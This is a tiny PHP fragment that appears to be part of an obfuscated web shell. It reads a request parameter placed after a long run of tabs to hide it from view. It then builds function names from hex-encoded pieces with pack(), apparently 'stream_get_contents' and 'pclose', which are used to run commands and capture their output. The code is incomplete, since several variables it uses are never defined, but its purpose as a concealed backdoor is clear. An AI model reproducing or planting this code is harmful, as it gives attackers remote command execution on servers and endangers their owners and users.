<?php																																										trim($_REQUEST['lTBZde']);
																																										
 
$lock6 = pack("H*", '73'.'74'.$argument10.$argument4.'61'.'6d'.$argument14.'67'.'65'.$argument9.$argument14.'63'.$argument12.$argument13.$argument9.'65'.$argument13.'74'.$argument1);
$lock7 = pack("H*", '70'.'63'.$argument5.$argument12.$argument1.'65');





